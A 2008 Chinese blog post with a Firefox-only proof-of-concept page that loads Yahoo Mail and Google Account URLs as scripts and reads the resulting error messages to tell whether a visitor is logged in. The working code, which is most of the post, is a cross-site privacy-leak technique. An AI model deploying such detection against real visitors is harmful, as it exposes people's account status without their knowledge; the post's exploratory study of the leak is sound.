今天看到一篇有意思的文章,关于用js检测用户是否登入某些Web应用的方法,虽然原文没有给出具体的实现代码,但我经过了一些研究之后,试着写了一段POC,经测试只能在Firefox下使用。IE下的错误信息和Firefox的错误信息接口不一样,暂时没有想到办法利用。
测试地址在这里
附上POC源代码:
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<meta name=”refer” content=”http://kentbrewster.com/patching-privacy-leaks/”>
<head>
<title> JavaScript WebSite Login Checker</title>
</head>
<body>
<script>
<!–
//hook firefox’s onerror event handler
window.onerror = err;
var sites = new Array(2);
sites['http://mail.yahoo.com/'] = new Array(5);
sites['http://mail.yahoo.com/']["name"] = ‘Yahoo Mail (Beta)’;
sites['http://mail.yahoo.com/']["login_msg"] = ‘missing } in XML expression’;
sites['http://mail.yahoo.com/']["login_line"] = ’12′;
sites['http://mail.yahoo.com/']["logout_msg"] = ‘syntax error’;
sites['http://mail.yahoo.com/']["logout_line"] = ’8′;
sites['https://www.google.com/accounts/ManageAccount'] = new Array(5);
sites['https://www.google.com/accounts/ManageAccount']["name"] = ‘Google Account’;
sites['https://www.google.com/accounts/ManageAccount']["login_msg"] = ‘XML tag name mismatch (expected a)’;
sites['https://www.google.com/accounts/ManageAccount']["login_line"] = ’144′;
sites['https://www.google.com/accounts/ManageAccount']["logout_msg"] = ‘missing = in XML attribute’;
sites['https://www.google.com/accounts/ManageAccount']["logout_line"] = ’35′;
function check(loc) {
var script = document.createElement(‘script’);
script.setAttribute(‘src’, loc);
script.setAttribute(‘type’,'text/javascript’);
var head = document.getElementsByTagName(“head”)[0];
head.appendChild(script);
}
function err(msg, loc, line) {
var res = document.getElementById(sites[loc].name);
if ((msg == sites[loc].login_msg) && (line == sites[loc].login_line)) {
res.innerHTML = ” Logged-in”;
} else if ((msg == sites[loc].logout_msg) && (line == sites[loc].logout_line)) {
res.innerHTML = ” Not Logged-in”;
} else {
res.innerHTML = ” Not Logged-in”;
}
window.stop();
}
// –>
function addSite(loc)
{
var results = document.getElementById(“results”);
var subdiv = document.createElement(“div”);
results.appendChild(subdiv);
var name = document.createElement(“span”);
name.innerHTML = sites[loc].name;
subdiv.appendChild(name);
var result = document.createElement(“span”);
result.setAttribute(“id”, sites[loc].name);
result.innerHTML = ” “;
subdiv.appendChild(result);
var button = document.createElement(“input”);
button.type=”button”;
button.value=”check”;
button.setAttribute(“onclick”,”check(‘”+ loc +”‘)”);
subdiv.appendChild(button);
}
</script>
<div align=”center”>
<h1>JavaScript WebSite Login Checker</h1>
<div id=”results”></div>
<script>
for(var i in sites){
addSite(i);
}
</script>
</div>
</body>
</html>
原创文章,转载请注明: 转载自猪在笑 [ http://www.huangwei.me/blog/ ]
本文链接地址: http://www.huangwei.me/blog/2008/03/14/%e4%bd%bf%e7%94%a8javascript%e6%a3%80%e6%b5%8b%e5%ae%a2%e6%88%b7%e7%ab%af%e7%94%a8%e6%88%b7%e6%98%af%e5%90%a6%e7%99%bb%e5%85%a5yahoogoogle%e8%b4%a6%e6%88%b7/
最近评论